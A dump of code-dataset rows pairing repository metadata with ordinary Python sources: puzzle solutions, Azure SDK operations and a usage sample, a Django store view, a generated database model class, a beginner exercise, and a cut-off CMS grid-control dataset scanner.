Dataset schema (field, type, observed range):

field                  type             observed range
blob_id                stringlengths    40 to 40
directory_id           stringlengths    40 to 40
path                   stringlengths    3 to 616
content_id             stringlengths    40 to 40
detected_licenses      listlengths      0 to 112
license_type           stringclasses    2 values
repo_name              stringlengths    5 to 115
snapshot_id            stringlengths    40 to 40
revision_id            stringlengths    40 to 40
branch_name            stringclasses    777 values
visit_date             timestamp[us]    2015-08-06 10:31:46 to 2023-09-06 10:44:38
revision_date          timestamp[us]    1970-01-01 02:38:32 to 2037-05-03 13:00:00
committer_date         timestamp[us]    1970-01-01 02:38:32 to 2023-09-06 01:08:06
github_id              int64            4.92k to 681M
star_events_count      int64            0 to 209k
fork_events_count      int64            0 to 110k
gha_license_id         stringclasses    22 values
gha_event_created_at   timestamp[us]    2012-06-04 01:52:49 to 2023-09-14 21:59:50
gha_created_at         timestamp[us]    2008-05-22 07:58:19 to 2023-08-21 12:35:19
gha_language           stringclasses    149 values
src_encoding           stringclasses    26 values
language               stringclasses    1 value
is_vendor              bool             2 classes
is_generated           bool             2 classes
length_bytes           int64            3 to 10.2M
extension              stringclasses    188 values
content                stringlengths    3 to 10.2M
authors                listlengths      1 to 1
author_id              stringlengths    1 to 132
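Each row below follows this schema, with the source file itself carried in the content field. As a minimal sketch of how such a dump can be consumed (assuming the rows are stored as a Parquet file; the file name below is hypothetical):

import pandas as pd

# Hypothetical file name; the dump's actual storage location is not stated here.
df = pd.read_parquet("code_dump_sample.parquet")

# Keep permissively licensed rows that are neither vendored nor auto-generated.
mask = (df["license_type"] == "permissive") & ~df["is_vendor"] & ~df["is_generated"]
for row in df.loc[mask].itertuples():
    print(row.repo_name, row.path, row.length_bytes)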
blob_id: baf1e8fce2a2ee27fd127101921e9812b45a1359
directory_id: ca7aa979e7059467e158830b76673f5b77a0f5a3
path: /Python_codes/p03564/s294555081.py
content_id: 483a512c9c4d677d13999a237fea6db9a60e2dad
detected_licenses: []
license_type: no_license
repo_name: Aasthaengg/IBMdataset
snapshot_id: 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
revision_id: f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
branch_name: refs/heads/main
visit_date: 2023-04-22T10:22:44.763102
revision_date: 2021-05-13T17:27:22
committer_date: 2021-05-13T17:27:22
github_id: 367,112,348
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 127
extension: py
content:
N = int(input())
K = int(input())
a = 1
for i in range(N):
    if a*2 > a+K:
        a += K
    else:
        a *= 2
print(a)
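As a worked example (input values assumed, not part of the dataset): with N = 4 and K = 3 each step keeps the smaller of a*2 and a+K, so the value evolves 1, 2, 4, 7, 10 and the script prints 10.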
blob_id: eb7c2a0bb4df36ca0ef54c23c6537d071bfdd2b2
directory_id: 074421d31af92ae29c7c78bdb7e50f199a38eb9b
path: /weixin/code/moc_def/moc_name_service/AppInstance.py
content_id: 41252cf3e8a2d8fe37562e79a7e9fb9cf03cbae0
detected_licenses: []
license_type: no_license
repo_name: allenforrest/wxbiz
snapshot_id: 3f49ce66b37e281fc375f548610aa54a0f73268f
revision_id: e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f
branch_name: refs/heads/master
visit_date: 2016-09-06T15:17:49.420934
revision_date: 2013-08-05T13:13:40
committer_date: 2013-08-05T13:13:40
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 5,356
extension: py
content:
#coding=gbk
import mit
from mit import MocBase, MocRule
from mit import MocAttrDef, ComplexAttrDef
import type_def
import err_code_mgr


# Automatically generated MOC; inheriting from it is not recommended.
class AppInstance(MocBase):
    __MOC_NAME__ = "AppInstance"
    __IMC_SYNC_PRIORITY__ = mit.IMC_SYNC_NOT_SYNC

    __ATTR_DEF__ = (
        MocAttrDef(name = 'pid', is_key = True, attr_type = type_def.TYPE_UINT32, max_len = 0),
        MocAttrDef(name = 'instance_name', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
        MocAttrDef(name = 'service_name', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
        MocAttrDef(name = 'instance_id', is_key = False, attr_type = type_def.TYPE_UINT32, max_len = 0),
        MocAttrDef(name = 'system_ip', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
        MocAttrDef(name = 'node_type', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
        MocAttrDef(name = 'endpoint', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
        MocAttrDef(name = 'endpoint_protocol', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
        MocAttrDef(name = 'update_time', is_key = False, attr_type = type_def.TYPE_UINT32, max_len = 64),
        MocAttrDef(name = 'state', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
    )

    __COMPLEX_ATTR_DEF__ = ()

    __ATTR_DEF_MAP__ = {attr.name: attr for attr in __ATTR_DEF__ + __COMPLEX_ATTR_DEF__}

    __ATTR_INDEX__ = ()

    __SQLITE_SELECT_SQL__ = 'select [moid], [pid], [instance_name], [service_name], [instance_id], [system_ip], [node_type], [endpoint], [endpoint_protocol], [update_time], [state] from tbl_AppInstance'
    __ORACLE_SELECT_SQL__ = 'select "moid", "pid", "instance_name", "service_name", "instance_id", "system_ip", "node_type", "endpoint", "endpoint_protocol", "update_time", "state" from tbl_AppInstance'
    __SQLITE_INSERT_SQL__ = 'insert into tbl_AppInstance ([moid], [pid], [instance_name], [service_name], [instance_id], [system_ip], [node_type], [endpoint], [endpoint_protocol], [update_time], [state]) values(?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11)'
    __ORACLE_INSERT_SQL__ = 'insert into tbl_AppInstance ("moid", "pid", "instance_name", "service_name", "instance_id", "system_ip", "node_type", "endpoint", "endpoint_protocol", "update_time", "state") values(:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11)'
    __SQLITE_UPDATE_SQL__ = 'update tbl_AppInstance set [instance_name]=?1, [service_name]=?2, [instance_id]=?3, [system_ip]=?4, [node_type]=?5, [endpoint]=?6, [endpoint_protocol]=?7, [update_time]=?8, [state]=?9 where [moid]=?10'
    __ORACLE_UPDATE_SQL__ = 'update tbl_AppInstance set "instance_name"=:1, "service_name"=:2, "instance_id"=:3, "system_ip"=:4, "node_type"=:5, "endpoint"=:6, "endpoint_protocol"=:7, "update_time"=:8, "state"=:9 where "moid"=:10'

    pid = 0
    instance_name = ''
    service_name = ''
    instance_id = 0
    system_ip = ''
    node_type = ''
    endpoint = ''
    endpoint_protocol = ''
    update_time = 0
    state = ''

    @classmethod
    def gen_moid(cls, **kw):
        return "AppInstance_%d" % (kw["pid"])

    def get_moid(self):
        return "AppInstance_%d" % (self.pid)

    @classmethod
    def get_attr_names(cls):
        return ('pid',), ('instance_name', 'service_name', 'instance_id', 'system_ip',
                          'node_type', 'endpoint', 'endpoint_protocol', 'update_time', 'state')

    def from_db_record(self, record):
        self.pid = record[1]
        self.instance_name = record[2]
        self.service_name = record[3]
        self.instance_id = record[4]
        self.system_ip = record[5]
        self.node_type = record[6]
        self.endpoint = record[7]
        self.endpoint_protocol = record[8]
        self.update_time = record[9]
        self.state = record[10]

    def to_db_record(self):
        return [self.get_moid(), self.pid, self.instance_name, self.service_name,
                self.instance_id, self.system_ip, self.node_type, self.endpoint,
                self.endpoint_protocol, self.update_time, self.state]

    def to_db_record_for_update(self):
        return [self.instance_name, self.service_name, self.instance_id, self.system_ip,
                self.node_type, self.endpoint, self.endpoint_protocol, self.update_time,
                self.state, self.get_moid()]


# Automatically generated rule.
class AppInstanceRule(MocRule):
    pass
blob_id: ada4adc8aad13242a94e5cb34122128661463484
directory_id: f576f0ea3725d54bd2551883901b25b863fe6688
path: /sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/aio/operations/_backup_protection_containers_operations.py
content_id: b6c5c15dd38539be1b961241d550d8eab0ed5a1e
detected_licenses: [ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
license_type: permissive
repo_name: Azure/azure-sdk-for-python
snapshot_id: 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
revision_id: c2ca191e736bb06bfbbbc9493e8325763ba990bb
branch_name: refs/heads/main
visit_date: 2023-09-06T09:30:13.135012
revision_date: 2023-09-06T01:08:06
committer_date: 2023-09-06T01:08:06
github_id: 4,127,088
star_events_count: 4,046
fork_events_count: 2,755
gha_license_id: MIT
gha_event_created_at: 2023-09-14T21:48:49
gha_created_at: 2012-04-24T16:46:12
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 6,734
extension: py
content:
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar
import urllib.parse

from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
    ClientAuthenticationError,
    HttpResponseError,
    ResourceExistsError,
    ResourceNotFoundError,
    ResourceNotModifiedError,
    map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat

from ... import models as _models
from ..._vendor import _convert_request
from ...operations._backup_protection_containers_operations import build_list_request
from .._vendor import RecoveryServicesBackupClientMixinABC

T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]


class BackupProtectionContainersOperations:
    """
    .. warning::
        **DO NOT** instantiate this class directly.

        Instead, you should access the following operations through
        :class:`~azure.mgmt.recoveryservicesbackup.activestamp.aio.RecoveryServicesBackupClient`'s
        :attr:`backup_protection_containers` attribute.
    """

    models = _models

    def __init__(self, *args, **kwargs) -> None:
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")

    @distributed_trace
    def list(
        self, vault_name: str, resource_group_name: str, filter: Optional[str] = None, **kwargs: Any
    ) -> AsyncIterable["_models.ProtectionContainerResource"]:
        """Lists the containers registered to Recovery Services Vault.

        :param vault_name: The name of the recovery services vault. Required.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present. Required.
        :type resource_group_name: str
        :param filter: OData filter options. Default value is None.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProtectionContainerResource or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})

        api_version: str = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version))
        cls: ClsType[_models.ProtectionContainerResourceList] = kwargs.pop("cls", None)

        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})

        def prepare_request(next_link=None):
            if not next_link:
                request = build_list_request(
                    vault_name=vault_name,
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    api_version=api_version,
                    template_url=self.list.metadata["url"],
                    headers=_headers,
                    params=_params,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                # make call to next link with the client's api-version
                _parsed_next_link = urllib.parse.urlparse(next_link)
                _next_request_params = case_insensitive_dict(
                    {
                        key: [urllib.parse.quote(v) for v in value]
                        for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
                    }
                )
                _next_request_params["api-version"] = self._config.api_version
                request = HttpRequest(
                    "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            deserialized = self._deserialize("ProtectionContainerResourceList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)  # type: ignore
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            _stream = False
            pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
                request, stream=_stream, **kwargs
            )
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(get_next, extract_data)

    list.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupProtectionContainers"
    }
blob_id: f13aa73d31a2841260ea3b48e0adb7200deb0fda
directory_id: d8fe3b5243bec2b61fd7907c4ff799b24bb617e5
path: /Bloomberg_codecon/General_challenger_problems/mug_color.py
content_id: 65d046ed2e35e926aa298629faa04dc9adabde17
detected_licenses: [ "Unlicense" ]
license_type: permissive
repo_name: SelvorWhim/competitive
snapshot_id: b89ed252512d88d9346d168dc6b48e0a42a6142d
revision_id: 1c73a5c7b2d0dc1b6c4f3f06ace69cdf5c6a34c0
branch_name: refs/heads/master
visit_date: 2023-04-13T01:02:52.083519
revision_date: 2023-04-11T10:14:38
committer_date: 2023-04-11T10:14:38
github_id: 96,573,533
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,927
extension: py
content:
### INSTRUCTIONS ###
'''
Jay S. has got himself in trouble! He had borrowed a friend's coffee mug and somehow lost it.
As his friend will be extremely angry when he finds out about it, Jay has decided to buy his
friend a replacement mug to try to control the damage. Unfortunately, Jay does not remember
the color of the mug he had borrowed. He only knows that the color was one of White, Black,
Blue, Red or Yellow. Jay goes around his office asking his colleagues if they are able to
recall the color, but his friends don't seem to remember the color of the mug either. What
they do know is what color the mug definitely was not. Based on this information, help Jay
figure out what the color of the mug was.

> Input Specifications

Your program will take an input N (1 <= N <= 1,000,000) which denotes the number of people
Jay questions regarding the mug. This will be followed by N strings S[1],S[2]...S[N] where
S[I] denotes the response of person I to Jay's question, i.e. what color the mug definitely
was not. S[I] will also be only one of the 5 colors namely White, Black, Blue, Red or Yellow.

> Output Specifications

Based on the input, print out the color of the mug. The color of the mug can only be one of
the 5 colors namely White, Black, Blue, Red or Yellow. You can safely assume that there
always exists only one unique color that the mug can have.
'''

### MY SOLUTION (accepted) ###
#Problem : Mug Color
#Language : Python 3
#Compiled Using : py_compile
#Version : Python 3.4.3
#Input for your program will be provided from STDIN
#Print out all output from your program to STDOUT

import sys

colors = ['White', 'Black', 'Blue', 'Red', 'Yellow']
data = sys.stdin.read().splitlines()
N = int(data[0])
for color in data[1:]:
    if color in colors:
        colors.remove(color)
print(colors[0])  # assumed exactly one remains. If more, will be first available. If none, error.
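As a worked example (responses assumed, not part of the dataset): with N = 4 and responses White, Black, Blue, Red, only Yellow is never ruled out, so the program prints Yellow.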
blob_id: 8acf70af05ca1f9fe91e400f1a44d60679f4a416
directory_id: f576f0ea3725d54bd2551883901b25b863fe6688
path: /sdk/resourcemover/azure-mgmt-resourcemover/generated_samples/operations_discovery_get.py
content_id: 2935b57661f79c96fcc7c1c5296b30643fa3afc0
detected_licenses: [ "LicenseRef-scancode-generic-cla", "MIT", "LGPL-2.1-or-later" ]
license_type: permissive
repo_name: Azure/azure-sdk-for-python
snapshot_id: 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
revision_id: c2ca191e736bb06bfbbbc9493e8325763ba990bb
branch_name: refs/heads/main
visit_date: 2023-09-06T09:30:13.135012
revision_date: 2023-09-06T01:08:06
committer_date: 2023-09-06T01:08:06
github_id: 4,127,088
star_events_count: 4,046
fork_events_count: 2,755
gha_license_id: MIT
gha_event_created_at: 2023-09-14T21:48:49
gha_created_at: 2012-04-24T16:46:12
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,503
extension: py
content:
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------

from azure.identity import DefaultAzureCredential
from azure.mgmt.resourcemover import ResourceMoverServiceAPI

"""
# PREREQUISITES
    pip install azure-identity
    pip install azure-mgmt-resourcemover
# USAGE
    python operations_discovery_get.py

    Before run the sample, please set the values of the client ID, tenant ID and client secret
    of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
    AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
    https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""


def main():
    client = ResourceMoverServiceAPI(
        credential=DefaultAzureCredential(),
        subscription_id="c183865e-6077-46f2-a3b1-deb0f4f4650a",
    )

    response = client.operations_discovery.get()
    print(response)


# x-ms-original-file: specification/resourcemover/resource-manager/Microsoft.Migrate/stable/2021-08-01/examples/OperationsDiscovery_Get.json
if __name__ == "__main__":
    main()
blob_id: 3d53fe5bfcc78cbe0f91bd04f98035197e584aa3
directory_id: d7ccb4225f623139995a7039f0981e89bf6365a4
path: /.history/store/views_20211011174414.py
content_id: b3aa780e17766d12a299e017068f39c7ef8a9c6c
detected_licenses: []
license_type: no_license
repo_name: tonnymuchui/django-mall
snapshot_id: 64fd4abc3725c1bd0a3dcf20b93b490fe9307b37
revision_id: 55c083d8433be3c77adc61939cd197902de4ce76
branch_name: refs/heads/master
visit_date: 2023-08-23T04:59:20.418732
revision_date: 2021-10-13T15:59:37
committer_date: 2021-10-13T15:59:37
github_id: 415,668,388
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,356
extension: py
content:
from django.shortcuts import get_object_or_404, render
from store.models import Product
from category.models import Category
from carts.views import _cart_id
from carts.models import CartItem
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator

# Create your views here.
def store(request, category_slug=None):
    categories = None
    products = None
    if category_slug is not None:
        categories = get_object_or_404(Category, slug=category_slug)
        products = Product.objects.filter(category=categories, is_available=True)
        products_count = products.count()
    else:
        products = Product.objects.all().filter(is_available=True)
        products_count = products.count()
    content = {
        'products': products,
        'products_count': products_count,
    }
    return render(request, 'store/store.html', content)


def product_detail(request, category_slug, product_slug):
    try:
        single_product = Product.objects.get(category__slug=category_slug, slug=product_slug)
        in_cart = CartItem.objects.filter(cart__cart_id=_cart_id(request), product=single_product).exists()
    except Exception as e:
        raise e
    content = {
        'single_product': single_product,
        'in_cart': in_cart,
    }
    return render(request, 'store/product_detail.html', content)
blob_id: 37170c7468eb730c386bcbb10eae65fbcf0897c5
directory_id: b8a13ecb7c0999954807e80c7470d8f752a3653b
path: /LearnPythonTheHardWay/Python3/ex13-more.py
content_id: 6ebf367feb72eaf15feceea90b4b64c2e17c6b07
detected_licenses: []
license_type: no_license
repo_name: jbarcia/Python-Books
snapshot_id: 59ca3d7b7fb1f2c1e3d1659f846032382af557a9
revision_id: 2106a2e5f56cdd4261bf870798a0a427d6137249
branch_name: refs/heads/master
visit_date: 2021-01-19T00:24:59.727307
revision_date: 2017-01-05T00:07:13
committer_date: 2017-01-05T00:07:13
github_id: 62,562,390
star_events_count: 2
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 355
extension: py
content:
#!/bin/python3
# ex13: Parameters, Unpacking, Variables
# Write a script that has more arguments.

from sys import argv

script, name, age, height, weight = argv

print("The script is called:", script)
print("Your name is:", name)
print("Your age is:", age)
print("Your height is %d inches" % int(height))
print("Your weight is %d pounds" % int(weight))
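As a worked example (argument values assumed): running python3 ex13-more.py Alice 30 65 120 prints the script name, the name and age, then "Your height is 65 inches" and "Your weight is 120 pounds".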
blob_id: 0c6ccdf28c7badab191e6122f4cf3b23b1815669
directory_id: f98de2db6b24d30d64f1145c7d8da4a40385a87f
path: /packages/grid_control_cms/scanner_cmssw.py
content_id: a23fc63e17f368f98fd9f72208b9a337e638e988
detected_licenses: []
license_type: no_license
repo_name: greyxray/grid-control
snapshot_id: f9f453491fe7bc506d4cfc240afaa364ba9db84b
revision_id: ed10fdb6ff604006a5d52dcd43c2e55c9e962c0a
branch_name: refs/heads/master
visit_date: 2020-04-15T13:15:21.103357
revision_date: 2019-01-08T18:23:07
committer_date: 2019-01-08T18:23:07
github_id: 164,709,043
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 8,694
extension: py
content:
# | Copyright 2010-2016 Karlsruhe Institute of Technology
# |
# | Licensed under the Apache License, Version 2.0 (the "License");
# | you may not use this file except in compliance with the License.
# | You may obtain a copy of the License at
# |
# |     http://www.apache.org/licenses/LICENSE-2.0
# |
# | Unless required by applicable law or agreed to in writing, software
# | distributed under the License is distributed on an "AS IS" BASIS,
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# | See the License for the specific language governing permissions and
# | limitations under the License.

import os, re, xml.dom.minidom
from grid_control import utils
from grid_control.config import triggerResync
from grid_control.datasets import DatasetError
from grid_control.datasets.provider_scan import GCProviderSetup
from grid_control.datasets.scanner_base import InfoScanner
from python_compat import all, bytes2str, ifilter, imap, lfilter, tarfile

triggerDataResync = triggerResync(['datasets', 'parameters'])


class GCProviderSetup_CMSSW(GCProviderSetup):
    scan_pipeline = ['ObjectsFromCMSSW', 'JobInfoFromOutputDir', 'FilesFromJobInfo',
                     'MatchOnFilename', 'MatchDelimeter', 'MetadataFromCMSSW', 'SEListFromPath',
                     'LFNFromPath', 'DetermineEvents', 'AddFilePrefix']


def readTag(base, tag, default = None):
    try:
        return str(base.getElementsByTagName(tag)[0].childNodes[0].data)
    except Exception:
        return default


def readList(base, container, items):
    try:
        return base.getElementsByTagName(container)[0].getElementsByTagName(items)
    except Exception:
        return []


class ObjectsFromCMSSW(InfoScanner):
    def __init__(self, config):
        InfoScanner.__init__(self, config)
        self._importParents = config.getBool('include parent infos', False, onChange = triggerResync(['datasets', 'parameters']))
        self._mergeKey = 'CMSSW_CONFIG_FILE'
        if config.getBool('merge config infos', True, onChange = triggerResync(['datasets', 'parameters'])):
            self._mergeKey = 'CMSSW_CONFIG_HASH'
        self._cfgStore = {}
        self._gtStore = {}
        self._regexAnnotation = re.compile(r'.*annotation.*=.*cms.untracked.string.*\((.*)\)')
        self._regexDataTier = re.compile(r'.*dataTier.*=.*cms.untracked.string.*\((.*)\)')

    def _processCfg(self, tar, cfg):
        cfgSummary = {}
        cfgContent = bytes2str(tar.extractfile('%s/config' % cfg).read())
        cfgHashResult = bytes2str(tar.extractfile('%s/hash' % cfg).read()).splitlines()
        cfgHash = cfgHashResult[-1].strip()
        cfgSummary = {'CMSSW_CONFIG_FILE': cfg, 'CMSSW_CONFIG_HASH': cfgHash}
        cfgSummary['CMSSW_CONFIG_CONTENT'] = self._cfgStore.setdefault(cfgSummary[self._mergeKey], cfgContent)
        # Read global tag from config file - first from hash file, then from config file
        if cfgHash not in self._gtStore:
            gtLines = lfilter(lambda x: x.startswith('globaltag:'), cfgHashResult)
            if gtLines:
                self._gtStore[cfgHash] = gtLines[-1].split(':')[1].strip()
        if cfgHash not in self._gtStore:
            try:
                cfgContentEnv = utils.execWrapper(cfgContent)
                self._gtStore[cfgHash] = cfgContentEnv['process'].GlobalTag.globaltag.value()
            except Exception:
                self._gtStore[cfgHash] = 'unknown:All'
        cfgSummary['CMSSW_GLOBALTAG'] = self._gtStore[cfgHash]
        # Get annotation from config content
        def searchConfigFile(key, regex, default):
            try:
                cfgSummary[key] = regex.search(cfgContent).group(1).strip('\"\' ') or default
            except Exception:
                cfgSummary[key] = default
        searchConfigFile('CMSSW_ANNOTATION', self._regexAnnotation, None)
        searchConfigFile('CMSSW_DATATIER', self._regexDataTier, 'USER')
        cfgReport = xml.dom.minidom.parseString(bytes2str(tar.extractfile('%s/report.xml' % cfg).read()))
        evRead = sum(imap(lambda x: int(readTag(x, 'EventsRead')), cfgReport.getElementsByTagName('InputFile')))
        return (cfgSummary, cfgReport, evRead)

    def _processOutputFile(self, cfgReport, outputFile):
        fileSummary = {'CMSSW_DATATYPE': readTag(outputFile, 'DataType'),
                       'CMSSW_EVENTS_WRITE': int(readTag(outputFile, 'TotalEvents'))}
        # Read lumisection infos
        lumis = []
        for run in readList(outputFile, 'Runs', 'Run'):
            runId = int(run.getAttribute('ID'))
            for lumi in run.getElementsByTagName('LumiSection'):
                lumis.append((runId, int(lumi.getAttribute('ID'))))
        fileSummary['CMSSW_LUMIS'] = lumis
        # Read parent infos
        if self._importParents:
            inputs = readList(outputFile, 'Inputs', 'Input')
            fileSummary.update({'CMSSW_PARENT_PFN': [], 'CMSSW_PARENT_LFN': []})
            for inputFileElement in inputs:
                pfn = readTag(inputFileElement, 'PFN')
                lfn = readTag(inputFileElement, 'LFN')
                if not lfn:
                    lfn = pfn[pfn.find('/store/'):]
                fileSummary['CMSSW_PARENT_PFN'].append(pfn)
                fileSummary['CMSSW_PARENT_LFN'].append(lfn)
        pfn = readTag(outputFile, 'PFN').split(':')[-1]
        return (fileSummary, pfn)

    def _processSteps(self, jobNum, tar, cfgSummaryMap, fileSummaryMap):
        cmsswVersion = bytes2str(tar.extractfile('version').read()).strip()
        for cfg in ifilter(lambda x: ('/' not in x) and (x not in ['version', 'files']), tar.getnames()):
            try:
                (cfgSummary, cfgReport, evRead) = self._processCfg(tar, cfg)
                cfgSummary['CMSSW_VERSION'] = cmsswVersion
                cfgSummaryMap[cfg] = cfgSummary
            except Exception:
                raise DatasetError('Could not read config infos about %s in job %d' % (cfg, jobNum))
            for outputFile in cfgReport.getElementsByTagName('File'):
                (fileSummary, pfn) = self._processOutputFile(cfgReport, outputFile)
                fileSummary['CMSSW_EVENTS_READ'] = evRead
                fileSummary['CMSSW_CONFIG_FILE'] = cfg
                fileSummaryMap.setdefault(pfn, {}).update(fileSummary)

    def getEntries(self, path, metadata, events, seList, objStore):
        jobNum = metadata['GC_JOBNUM']
        cmsRunLog = os.path.join(path, 'cmssw.dbs.tar.gz')
        if os.path.exists(cmsRunLog):
            tar = tarfile.open(cmsRunLog, 'r')
            # Collect infos about transferred files
            fileSummaryMap = {}
            try:
                for rawdata in imap(lambda value: bytes2str(value).split(), tar.extractfile('files').readlines()):
                    fileSummaryMap[rawdata[2]] = {'SE_OUTPUT_HASH_CRC32': rawdata[0], 'SE_OUTPUT_SIZE': int(rawdata[1])}
                objStore['CMSSW_FILES'] = fileSummaryMap
            except Exception:
                raise DatasetError('Could not read CMSSW file infos for job %d!' % jobNum)
            # Collect infos about CMSSW processing steps
            cfgSummaryMap = {}
            self._processSteps(jobNum, tar, cfgSummaryMap, fileSummaryMap)
            for cfg in cfgSummaryMap:
                metadata.setdefault('CMSSW_CONFIG_JOBHASH', []).append(cfgSummaryMap[cfg]['CMSSW_CONFIG_HASH'])
            objStore.update({'CMSSW_CONFIG': cfgSummaryMap, 'CMSSW_FILES': fileSummaryMap})
            tar.close()
        yield (path, metadata, events, seList, objStore)


class MetadataFromCMSSW(InfoScanner):
    def __init__(self, config):
        InfoScanner.__init__(self, config)
        self.includeConfig = config.getBool('include config infos', False, onChange = triggerResync(['datasets', 'parameters']))

    def getEntries(self, path, metadata, events, seList, objStore):
        cmssw_files_dict = objStore.get('CMSSW_FILES', {})
        metadata.update(cmssw_files_dict.get(metadata.get('SE_OUTPUT_FILE'), {}))
        if self.includeConfig:
            cmssw_config_dict = objStore.get('CMSSW_CONFIG', {})
            metadata.update(cmssw_config_dict.get(metadata.get('CMSSW_CONFIG_FILE'), {}))
        yield (path, metadata, events, seList, objStore)


class SEListFromPath(InfoScanner):
    def getEntries(self, path, metadata, events, seList, objStore):
        tmp = path.split(':', 1)
        if len(tmp) == 1:
            tmp = ['dir', tmp[0]]
        proto, fn = tmp
        if proto in ['dir', 'file']:
            yield (path, metadata, events, ['localhost'], objStore)
        elif proto in ['rfio']:
            if 'cern.ch' in path:
                yield (path, metadata, events, ['caf.cern.ch'], objStore)
            else:
                yield (path, metadata, events, [fn.lstrip('/').split('/')[1]], objStore)
        elif proto in ['srm', 'gsiftp']:
            yield (path, metadata, events, [fn.split(':')[0].lstrip('/').split('/')[0]], objStore)
        else:
            yield (path, metadata, events, seList, objStore)


class LFNFromPath(InfoScanner):
    def __init__(self, config):
        InfoScanner.__init__(self, config)
        self.stripPath = config.get('lfn marker', '/store/', onChange = triggerResync(['datasets', 'parameters']))

